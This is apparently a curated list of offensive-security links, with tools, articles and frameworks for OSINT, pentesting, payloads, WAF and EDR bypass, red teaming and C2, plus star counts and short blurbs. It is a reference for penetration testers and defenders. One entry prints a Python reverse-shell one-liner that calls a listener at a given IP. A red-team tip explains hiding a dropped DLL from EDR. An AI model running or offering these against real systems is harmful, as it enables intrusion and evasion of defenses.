DetectDee | 1,289 | about 1 year ago | : Hunt down social media accounts by username, email or phone across social networks |
OSINT framework | focused on gathering information from free tools or resources | ||
h8mail | 4,187 | over 1 year ago | : Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email |
PwnBin | 427 | about 3 years ago | : Python Pastebin Webcrawler that returns list of public pastebins containing keywords |
ODBParser | : OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories | ||
pastego | 97 | almost 3 years ago | : Scrape/Parse Pastebin using GO and expression grammar (PEG) |
Instagram Scraper | : Scrapes an instagram user's photos and videos | ||
galer | 253 | 11 days ago | : A fast tool to fetch URLs from HTML attributes by crawling |
How to bypass CloudFlare bot protection? | |||
SpyScrap | 169 | 12 months ago | : CLI and GUI for OSINT. Are you overexposed on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results |
pwnedOrNot | 2,239 | about 1 year ago | : OSINT tool for finding passwords of compromised email addresses |
dorking | (how to find anything on the Internet) | ||
Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing | |||
The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target. | |||
DorkGenius | : Generate custom dorks for Google, Bing, DuckDuckGo, & more! | ||
chatter | 146 | over 1 year ago | : internet monitoring osint telegram bot for windows |
Slackhound | 74 | 9 months ago | : Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects |
ail-feeder-telegram | 13 | 10 days ago | : External telegram feeder for AIL framework |
MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES | |||
signald | : unofficial daemon for interacting with Signal | ||
Telegram messenger CLI | 386 | over 2 years ago | : for Telegram IM |
TelegramScraper | 42 | about 4 years ago | : Telegram scraping tool for researching mis-/disinformation and investigating shady goings-on |
OSINT-Discord-resources | 347 | 8 months ago | : Some OSINT Discord resources |
CSIRT / Pentesting / Vulnerability | |||
Striker | 2,234 | over 1 year ago | : an offensive information and vulnerability scanner |
SQL Vulnerability Scanner | 975 | almost 7 years ago | |
Decentralized Application Security Project | |||
Introduction to IDAPython for Vulnerability Hunting — Somerset Recon | |||
Beating the OWASP Benchmark | |||
CMSScan | 964 | over 3 years ago | : Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues |
Meteor Blind NoSQL Injection | |||
Security Bulletins that relate to Netflix Open Source | 742 | about 2 months ago | |
tsunami-security-scanner | 8,274 | 2 months ago | : Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence |
Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners | |||
New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service | : allows an attacker to remotely access any TCP/UDP service bound to a victim machine, bypassing the victim's NAT/firewall, just by the victim visiting a website (with video) | ||
openVulnQuery | 29 | over 1 year ago | : A Python-based client for the Cisco openVuln API |
HellRaiser | 562 | over 1 year ago | : Vulnerability Scanner |
Open-Source Vulnerability Intelligence Center | : Vulnerability Intelligence Center / Exploits | ||
Vagrant GVM/Openvas | 4 | over 3 years ago | : GVM/Openvas vulnerability scanner in Alpine with Vagrant |
How to Have a Cybersecurity Graph Database on Your PC | |||
On the Security Vulnerabilities of Text-to-SQL Models | |||
CSIRT / Pentesting / WAFs | |||
Web Application Penetration Testing Course URLs | |||
Web Application Penetration Testing Notes | |||
quarantyne | 119 | over 2 years ago | : Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails |
Sitadel | 554 | 12 months ago | : Web Application Security Scanner |
WAF through the eyes of hackers | |||
Some nice payloads to bypass XSS WAF | |||
Some MySQL tricks to break some #WAFs out there. | |||
another one | |||
bypassing modern web application firewalls | |||
WAFW00F | 5,296 | about 2 months ago | : identifies and fingerprints Web Application Firewall (WAF) products protecting a website |
Bypassing Cloudflare WAF with the origin server IP address | |||
WAF-Hook | 5 | 8 months ago | |
CSIRT / Pentesting / WAFs / How to find real IP of a site behind cloudflare | |||
Cloudfail tool | |||
Shadowcrypt Cloudflare resolve | |||
Behindflare tool | 15 | almost 2 years ago | |
WordPress technique | |||
CSIRT / Pentesting / WAFs | |||
A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection | |||
CSIRT / Pentesting / Exploits | |||
IOSurface exploit | 218 | 5 months ago | |
Attacking a co-hosted VM: A hacker, a hammer and two memory modules | |||
How To Create a Metasploit Module | |||
Installing Metasploit Pro, Ultimate, Express, and Community | |||
unfurl | 60 | almost 7 years ago | |
A collection of vulnerable ARM binaries for practicing exploit development | 898 | about 3 years ago | |
A collection of PHP exploit scripts | 838 | 9 months ago | |
Sage ACF Blocks | 37 | 6 months ago | : A Sage 10 helper package for building ACF blocks rendered using blade templates |
WebKit exploit | 749 | over 3 years ago | |
Modern Binary Exploitation - Spring 2015 | |||
Python 2 vs 3 for Binary Exploitation Scripts | (video) | ||
DriveCrypt | : DriveCrypt Dcr.sys vulnerability exploit | ||
Faxploit | : Sending Fax Back to the Dark Ages | ||
beebug | 210 | over 5 years ago | : A tool for checking exploitability |
NAVEX | : Precise and scalable exploit generation for dynamic web applications | ||
Three New DDE Obfuscation Methods | |||
SILENTTRINITY | 2,196 | 12 months ago | : A post-exploitation agent powered by Python, IronPython, C#/.NET |
fuxploider | 3,050 | over 1 year ago | : File upload vulnerability scanner and exploitation tool |
Jailbreaks Demystified | – GeoSn0w – Programmer. Hacking stuff | ||
Attacking Google Authenticator | |||
Pacu | 4,400 | 8 days ago | : The AWS exploitation framework, designed for testing the security of Amazon Web Services environments |
CSIRT / Pentesting / Exploits / Glibc Heap Exploitation Basics: | |||
Introduction to ptmalloc2 internals (Part 1) | |||
ptmalloc2 internals (Part 2) | Fast Bins and First Fit Redirection | ||
CSIRT / Pentesting / Exploits | |||
movfuscator | 9,503 | 6 months ago | : The single instruction C compiler |
UEFI vulnerabilities classification focused on BIOS implant delivery | |||
MikroTik Firewall & NAT Bypass | |||
3D Accelerated Exploitation | 54 | almost 6 years ago | : The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium |
GhostDelivery | : Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions | ||
Beat the hole in the ATM | : hacking a Diebold ATM | ||
RedGhost | 536 | over 3 years ago | : Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace |
PowerSploit | 11,936 | over 4 years ago | : a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment |
Z-Shave. Exploiting Z-Wave downgrade attacks | |||
Totally Pwning the Tapplock Smart Lock | Andrew Tierney 13 Jun 2018 | ||
I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 | : python -c "import pty,socket,os;h,p='192.168.200.1',12345;s=socket.create_connection((h,p));[os.dup2(s.fileno(),i)for i in(0,1,2)];pty.spawn('/bin/sh')" | ||
The Art of WebKit Exploitation | |||
PEASS | 16,117 | 21 days ago | : Privilege Escalation Awesome Scripts SUITE |
Patchless AMSI bypass using SharpBlock | |||
CSIRT / Pentesting / Exploits / Patchless AMSI bypass using SharpBlock | |||
Lets Create An EDR… And Bypass It! Part 1 | |||
Lets Create An EDR… And Bypass It! Part 2 | |||
SharpBlock | 1,114 | over 3 years ago | : A method of bypassing EDRs' active protection DLLs by preventing entry point execution. Also includes a simple EDR implementation to demonstrate the bypass |
CSIRT / Pentesting / Exploits | |||
Bypassing Antivirus with Golang – Gopher it! | |||
The Invoke-CradleCrafter Overview | |||
DVS | 197 | about 4 years ago | : D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects |
The Exploit Database Git Repository | 7,738 | about 2 years ago | |
Vulnerability Lab | : an independent bug bounty hacker community; leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them | ||
0day.Today | : Biggest exploits database and 0day market - The Underground, one of the world's most popular and comprehensive computer security web sites | ||
cxsecurity | : an open project developed and moderated fully by one independent person | ||
Security Focus | |||
Exploit Files | Packet Storm | ||
Graphology of an Exploit | : Hunting for exploits by looking for the author’s fingerprints | ||
Traditional Buffer Overflow Windows cheatsheet | |||
Exploit writing tutorial part 3 : SEH Based Exploits | |||
Vulnerability DB | : Detailed information and remediation guidance for known vulnerabilities | ||
mssqlproxy | 724 | almost 4 years ago | : a toolkit for performing lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse |
Script to decode .vbe files | |||
A First Introduction to System Exploitation | |||
AllPocsFromHackerOne | 874 | almost 2 years ago | : This script grabs public reports from HackerOne and downloads all JSON files so they can be grepped |
How I Found My First Ever ZeroDay (In RDP) | |||
Learning Linux Kernel Exploitation | Part 1 | ||
SharpSelfDelete | 147 | about 3 years ago | : C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs |
preeny | 1,574 | 7 months ago | : Some helpful preload libraries for pwning stuff |
Exploits, Vulnerabilities and Payloads: Practical Introduction | |||
Beginners Guide to 0day/CVE AppSec Research | |||
0days In-The-Wild | Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero | ||
Sticky notes for pentesting. | |||
CSIRT / Pentesting / Payloads | |||
Payloads Collection | by @alra3ees: | ||
CSIRT / Pentesting / Payloads / Payloads Collection | |||
Command Injection Payload List | 3,006 | 4 months ago | |
Cross Site Scripting (XSS) Vulnerability Payload List | 6,366 | 4 months ago | |
XML External Entity (XXE) Injection Payload List | 1,097 | 4 months ago | : XML External Entity (XXE) Injection Payload List |
SQL Injection Payload List | 5,000 | 4 months ago | : SQL Injection Payload List |
RFI/LFI Payload List | 538 | 4 months ago | |
Open Redirect Payload List | 533 | 4 months ago | |
CSIRT / Pentesting / Payloads / MSFVenom: | |||
Creating reverse shell payloads with MSFVenom | (pt-br) | ||
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | |||
MSFVenom - CheatSheet | |||
Hiding Metasploit Shellcode to Evade Windows Defender | |||
Creating Metasploit Payloads | |||
Shikata Ga Nai Encoder Still Going Strong | |||
BYPASSING ANTIVIRUS WITH MSFVENOM | |||
MSFVenom Cheatsheet | |||
CSIRT / Pentesting / Payloads | |||
Payload Delivery for DevOps | : Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker | ||
LaTex Injection | 61,485 | 4 days ago | |
Hiding malicious code with “Module Stomping”: Part 1 | |||
Phantom-Evasion | 1,392 | about 1 year ago | : Python antivirus evasion tool |
Steganography | 572 | about 1 month ago | : Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images |
PyFuscation | 510 | almost 2 years ago | : Obfuscate powershell scripts by replacing Function names, Variables and Parameters |
Starting a handler with Metasploit | |||
Reverse Shell Cheat Sheet | |||
System Calls | 107 | about 3 years ago | : An example of using Syscalls in C# to get a meterpreter shell |
Awesome one-liner bug bounty | |||
bbrecon | 219 | over 3 years ago | Python library and CLI for the Bug Bounty Recon API |
RPC Bug Hunting Case Studies – Part 1 | |||
Top Penetration Testing & Bug Hunting YouTube Channels you should follow | Updated 11/19/2020 | ||
Our top tips for better bug bounty reports, plus a hacker contest! | |||
axiom | 4,058 | about 2 months ago | : The dynamic infrastructure framework for anybody! |
KindleDrip | : From Your Kindle’s Email Address to Using Your Credit Card | ||
Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft | |||
How I Might Have Hacked Any Microsoft Account | |||
BugBountyScanner | 874 | 11 months ago | : A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use |
alert() is dead, long live print() | |||
Bug Bounty Reconnaissance Framework | 295 | 5 days ago | The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices |
If you use BBRF, here is an initial script that uses the HackerOne API to gather all programs' scope, including your private programs. | |||
KeyHacks | 5,099 | 3 months ago | is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid |
NotKeyHacks | is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time | ||
Two Rights Might Make A Wrong | |||
You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this. | |||
OOB reads in network message handlers leads to RCE | |||
Bug Bounty Resources | |||
Google Bug Hunters | Welcome to Google's Bug Hunting community | ||
0-Day Hunting (Chaining Bugs/Methodology) | |||
KingOfBugBounty Project | 4,234 | 4 months ago | : Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters |
awesome-web-hacking | 5,875 | 1 day ago | : A list of web application security |
gau | 4,000 | 25 days ago | : Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl |
malvun | is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself | ||
Introducing CookieMonster | : a tool for breaking stateless authentication | ||
get-title | 2,148 | about 1 year ago | |
Insecure Direct Object References | 61,485 | 4 days ago | |
bugbounty-cheatsheet | 5,938 | about 1 year ago | : A list of interesting payloads, tips and tricks for bug bounty hunters |
Awesome Bug Bounty | 4,668 | 10 months ago | : A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups |
ParamSpider | 2,527 | 5 months ago | : Mining parameters from dark corners of Web Archives |
Server Side Request Forgery | 61,485 | 4 days ago | |
CRLF | 5,938 | about 1 year ago | |
CRLF Injection | 61,485 | 4 days ago | |
crlf-injector | 46 | over 2 years ago | : A CRLF (Carriage Return Line Feed) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL |
CRLF Bruter | 10 | over 3 years ago | : A simple tool to test for CRLF injection |
CSV-Injection | 5,938 | about 1 year ago | |
CSV Injection | 61,485 | 4 days ago | |
Command Injection | 61,485 | 4 days ago | |
Directory Traversal | 61,485 | 4 days ago | |
$4,000 Starbucks secondary context path traversal | |||
LFI | 5,938 | about 1 year ago | |
kadimus | 514 | over 4 years ago | : kadimus is a tool to check for and exploit LFI vulnerabilities |
fimap | : is a little Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps | ||
File Inclusion | 61,485 | 4 days ago | |
Open-Redirect | 5,938 | about 1 year ago | |
RCE | 5,938 | about 1 year ago | |
Crypto | 5,938 | about 1 year ago | |
Template Injection | 5,938 | about 1 year ago | |
SSTI | 61,485 | 4 days ago | |
XSLT | 5,938 | about 1 year ago | |
Content Injection | 5,938 | about 1 year ago | |
LDAP Injection | 61,485 | 4 days ago | |
NoSQL Injection | 61,485 | 4 days ago | |
IDOR | 61,485 | 4 days ago | |
ISCM | 61,485 | 4 days ago | |
OAuth | 61,485 | 4 days ago | |
XPATH Injection | 61,485 | 4 days ago | |
Bypass Upload Tricky | 61,485 | 4 days ago | |
Web Security CheatSheet | |||
Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment. | |||
Zeus-Scanner | 959 | about 1 year ago | : is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas |
CSIRT / Pentesting / Payloads / SQL Injection: | |||
SQL injection | |||
SQL Injection | |||
Blind SQL injection | |||
Dangerous Injections | |||
Blind SQL Injection at fasteditor.hema.com | |||
SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack | |||
SQL injection cheat sheet | |||
SQL Injection Cheat Sheet | |||
The Ultimate SQL Injection Cheat Sheet | |||
Examining the database in SQL injection attacks | |||
Dumping a complete database using SQL injection | |||
SQLi | 5,938 | about 1 year ago | |
SleuthQL | : A SQL Injection Discovery Tool | ||
Postgres SQL Injection Cheat Sheet | |||
From SQL Injection to Shell: PostgreSQL edition | |||
Pentesting PostgreSQL with SQL Injections | |||
SQLite Injection | 61,485 | 4 days ago | |
Blind SQL Injection Detection and Exploitation (Cheat Sheet) | |||
SQLMap Cheat Sheet: 1 | |||
SQL injection | : Improper handling of input during SQL query generation | ||
An investigation into SQL Injection tools — The pattern of each attack tool Part II | |||
Advanced SQL Injection | |||
CSIRT / Pentesting / Payloads / CSRF: | |||
DNS Hijacking Attacks on Home Routers in Brazil | |||
CSRF Injection | 61,485 | 4 days ago | |
Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections | |||
CSIRT / Pentesting / Payloads / HTTP Request Smuggling: | |||
HRS - HTTP Request Smuggling Attack. What, Why and How. | |||
Practical Attacks Using HTTP Request Smuggling | |||
HAProxy HTTP request smuggling | (CVE-2019-18277) | ||
The Powerful HTTP Request Smuggling | |||
Smuggler | 13 | about 2 years ago | : An HTTP Request Smuggling / Desync testing tool written in Python 3 |
HTTP.Request.Smuggling.Desync.Attack | 14 | over 3 years ago | : HTTP request smuggling is a technique for interfering with the way a website processes the sequences of HTTP requests received from one or more users |
h2c Smuggling | : Request Smuggling Via HTTP/2 Cleartext (h2c) | ||
HTTP Request Smuggler | 958 | 11 months ago | : This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research |
Advanced request smuggling | |||
CSIRT / Pentesting / Payloads / XSS: | |||
Cross-site scripting (XSS) cheat sheet | |||
Reflected XSS on www.hackerone.com via Wistia embed code | |||
xss cheatsheet | 5,938 | about 1 year ago | |
Cross Site Scripting ( XSS ) Vulnerability Payload List | 6,366 | 4 months ago | |
an XSS payload, Cuneiform-alphabet based | |||
CSIRT / Pentesting / Payloads | |||
Security impact of a misconfigured CORS implementation | |||
Which Security Risks Do CORS Imply? | |||
Cross-Origin Resource Sharing (CORS) | |||
How to win at CORS | |||
CORS'ing a Denial of Service via cache poisoning | |||
SSRF Search & Destroy | |||
SSRF | 5,938 | about 1 year ago | |
SSRF Tips | : some tips with Server Side Request Forgery | ||
Server Side Request Forgery on MISP | : CVE-2020-28043 | ||
SSRF (Server Side Request Forgery) worth $4,913 - My Highest Bounty Ever! | |||
Unauthenticated Full-Read SSRF in Grafana | : CVE-2020-13379 | ||
Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata | |||
Gf-Patterns | 1,218 | 2 months ago | : GF patterns for grepping parameters (SSRF, RCE, LFI, SQLi, SSTI, IDOR, URL redirection, debug_logic, interesting subs) |
Blind SSRF Chains | |||
lorsrf | 289 | 2 months ago | : Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods |
Out of Band XXE in an E-commerce iOS app | |||
Comprehensive Guide on XXE Injection | |||
XMLDecoder payload generator | 149 | almost 4 years ago | : A simple Python script to generate XML payloads that work with XMLDecoder, based on ProcessBuilder and Runtime exec |
Enjoying my first blind xxe experience | |||
XXE | 5,938 | about 1 year ago | |
dtd-finder | 610 | 9 months ago | : List DTDs and generate XXE payloads using those local DTDs |
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! | |||
XXE_payloads | |||
Advanced XXE Exploitation | |||
Planilhas Baby (pt-br: Spreadsheets Baby) | SSRF + SSTI + XXE | ||
ysoserial | 7,789 | 8 months ago | : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization |
SerialVersionUID in Java | |||
Java Serialization Magic Methods And Their Uses With Example | |||
Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020-9484) | : java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse | ||
CVE-2020-9484-Mass-Scan | 32 | over 4 years ago | |
Exploiting JNDI Injections in Java | |||
How to exploit Liferay CVE-2020-7961 : quick journey to PoC | |||
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM | |||
Serialization: the big threat | |||
marshalsec | 3,403 | almost 2 years ago | : Turning your data into code execution |
SerializationDumper | 989 | 5 months ago | : A tool to dump Java serialization streams in a more human readable form |
owaspsd-deserialize-my-shorts | 5 | over 8 years ago | : Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization" |
Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities | |||
Deserialization | |||
FAR SIDES OF JAVA REMOTE PROTOCOLS | |||
Serialization and deserialization in Java: explaining the Java deserialize vulnerability | |||
Testing and exploiting Java Deserialization in 2021 | |||
Queries and Mutations | |||
GraphQL Injection | 61,485 | 4 days ago | |
GraphQL | : Common vulnerabilities & how to exploit them; represent any GraphQL API as an interactive graph | ||
GraphQLmap | 1,390 | 9 months ago | : is a scripting engine to interact with a graphql endpoint for pentesting purposes |
CSIRT / Pentesting / Payloads / RPC: | |||
Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries | |||
ProtoFuzz | 272 | over 1 year ago | : Google Protocol Buffers message generator |
pbtk - Reverse engineering Protobuf apps | 1,414 | about 1 month ago | : A toolset for reverse engineering and fuzzing Protobuf-based apps |
Online Protobuf Decoder. | |||
CSIRT / Pentesting / Payloads | |||
Burp Suite Cheat Sheet | |||
Burp Suite Academy | |||
CSIRT / Pentesting / Payloads / REST Assured: Penetration Testing REST APIs Using Burp Suite: | |||
Part 1 – Introduction & Configuration | |||
Part 2 – Testing | |||
Part 3 – Reporting | |||
CSIRT / Pentesting / Payloads | |||
Awesome Burp Extensions | 3,001 | 5 days ago | : A curated list of amazingly awesome Burp Extensions |
BurpSuiteHTTPSmuggler | 709 | over 5 years ago | : A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques |
AutoRepeater | 846 | almost 3 years ago | : Automated HTTP Request Repeating With Burp Suite |
privatecollaborator | 205 | 5 months ago | : A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate |
Deploying a private Burp Collaborator server | |||
Burp Collaborator Server docker container with LetsEncrypt certificate | 280 | 4 months ago | : This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server |
SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT | : The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data | ||
AES-Killer v3.0 | : Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly | ||
Femida-xss | 277 | about 5 years ago | : Automated blind-xss search for Burp Suite |
dotNetBeautifier | 12 | over 9 years ago | : A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE) |
Java-Deserialization-Scanner | 775 | about 3 years ago | : All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities |
JavaSerialKiller | 208 | 10 months ago | : Burp extension to perform Java Deserialization Attacks |
BurpBounty | 1,680 | 7 months ago | : Burp Bounty (Scan Check Builder in BApp Store) is an extension of Burp Suite that improves an active and passive |
How to install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04 | |||
BurpExtension-WhatsApp-Decryption-CheckPoint | 637 | about 5 years ago | |
InQL | 1,540 | 5 months ago | : A Burp Extension for GraphQL Security Testing |
param-miner | 1,245 | 9 days ago | |
PII-Identifier | 21 | almost 4 years ago | : Burp Extension to identify PII data |
403Bypasser | 1,567 | over 1 year ago | : Burpsuite Extension to bypass 403 restricted directory |
API testing with Swurg for Burp Suite | |||
Burp Bounty | : create a Passive Profile for a param value, like testsqli, and then create a Rule with this Profile to trigger the SQLi active profile | ||
Handling Short Expiration Time of Authorization Tokens | |||
BurpSuite-Team-Extension | 252 | about 2 years ago | : This Burpsuite plugin allows multiple web app testers to share their proxy history with each other in real time. Requests that come through your Burpsuite instance will be replicated in the history of the other testers and vice-versa! |
ActiveScan++ | 208 | 12 months ago | : ActiveScan++ Burp Suite Plugin |
CSIRT / Pentesting / Red Team | |||
Awesome Red Teaming | 6,917 | 11 months ago | |
DumpsterFire | 997 | over 4 years ago | : "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts |
Machine Learning for Red Teams, Part 1 | |||
Flying under the radar | : Hack into a "highly protected" company without getting caught | ||
demiguise | 1,371 | about 2 years ago | : HTA encryption tool for RedTeams |
Sn1per | 8,140 | about 1 month ago | : Automated pentest framework for offensive security experts |
jenkins-shell | 94 | over 6 years ago | : Automating Jenkins Hacking using Shodan API |
Red Team's SIEM | 2,383 | 2 months ago | : easily deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations |
The-Hacker-Playbook-3-Translation | 2,289 | over 4 years ago | : A translation of The Hacker Playbook 3 (into Chinese). |
How Do I Prepare to Join a Red Team? | |||
Red Team & Physical Entry Gear | |||
Red Team Techniques: Gaining access on an external engagement through spear-phishing | |||
Phantom Tap (PhanTap) | 582 | 6 months ago | : an ‘invisible’ network tap aimed at red teams |
So You Want to Run a Red Team Operation | : I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization | ||
Alternative C2 for Red Teamers | : Koadic C3 COM Command & Control - JScript RAT | ||
tuning tip | : if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder) | ||
In-Memory-Only ELF Execution (Without tmpfs) | : In which we run a normal ELF binary on Linux without touching the filesystem (except /proc) | ||
A Red Teamer's guide to pivoting | |||
caldera | 5,668 | 1 day ago | : Automated Adversary Emulation |
BankSecurity - Red_Team | 1,551 | almost 3 years ago | : Some scripts useful for red team activities |
FIN6 Adversary Emulation | 1,726 | 11 months ago | |
Red-Teaming-Toolkit | 9,116 | 3 months ago | : A collection of open source and commercial tools that aid in red team operations |
RedFile | 18 | over 2 years ago | : A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads |
Choose Your Own Red Team Adventure | |||
Red Tip #415 | : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account | ||
Red Team Tactics: Hiding Windows Services | |||
AQUARMOURY | : This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005 | ||
Prelude Operator | : is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming | ||
0xsp Mongoose Red for Windows | 530 | over 2 years ago | : a unique framework for cybersecurity simulation and red teaming operations, Windows auditing for newer vulnerabilities, misconfigurations and privilege escalation attacks, replicating the tactics and techniques of an advanced adversary in a network |
Macrome | 513 | almost 3 years ago | : Excel Macro Document Reader/Writer for Red Teamers & Analysts |
FireEye Red Team Tool Countermeasures | 2,650 | 9 months ago | |
wifipumpkin3 | 1,982 | 11 months ago | : Powerful framework for rogue access point attack |
The worst of the two worlds: Excel meets Outlook | |||
redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness | 252 | 5 months ago | |
pivoting cheat sheet | |||
Self-hosting Your Red Team Payloads | : Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV | ||
Boomerang | 216 | almost 4 years ago | is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks |
Mythic | 3,263 | 7 days ago | : A collaborative, multi-platform, red teaming framework |
Alan Framework | 462 | 10 months ago | : A post-exploitation framework |
Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams | |||
Red Teaming/Adversary Simulation Toolkit | |||
Wiki to collect Red Team infrastructure hardening resources | 4,154 | 8 months ago | |
Red Team development and operations | : A practical guide to red team operations, written by Joe Vest and James Tubberville | ||
VECTR | 1,393 | 2 months ago | is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios |
Mortar Loader | 1,413 | 11 months ago | : evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR) |
RedTeam-Tools | 6,033 | over 1 year ago | : Tools and Techniques for Red Team / Penetration Testing |
Cobalt Strike | : is software for Adversary Simulations and Red Team Operations. 4.2 | ||
CrossC2 | 2,283 | about 1 year ago | : generate CobaltStrike's cross-platform payload |
Cobalt-Strike-CheatSheet | 986 | almost 3 years ago | : Some notes and examples for cobalt strike's functionality |
Introducing | |||
Octopus | 730 | over 3 years ago | : Open source pre-operation C2 server based on python and powershell |
Covenant | 4,197 | 4 months ago | : Covenant is a collaborative .NET C2 framework for red teamers |
Building C2 Implants in C++: A Primer | |||
tc2 | 26 | almost 4 years ago | : Traefik-fronted C2 examples |
ToRat | 977 | over 1 year ago | : is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication |
Python Backdoor Talking to a C2 Through Ngrok | |||
Sliver | 8,536 | 11 days ago | : Implant framework |
PoshC2 | 1,820 | about 1 month ago | : is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement |
pyMalleableC2 | 267 | 24 days ago | : Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically |
link | 563 | over 3 years ago | : is a command and control framework written in rust |
Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1 | |||
Third step in setting up a C2 environment. Using socat as a front to Merlin. Command and control my way. | |||
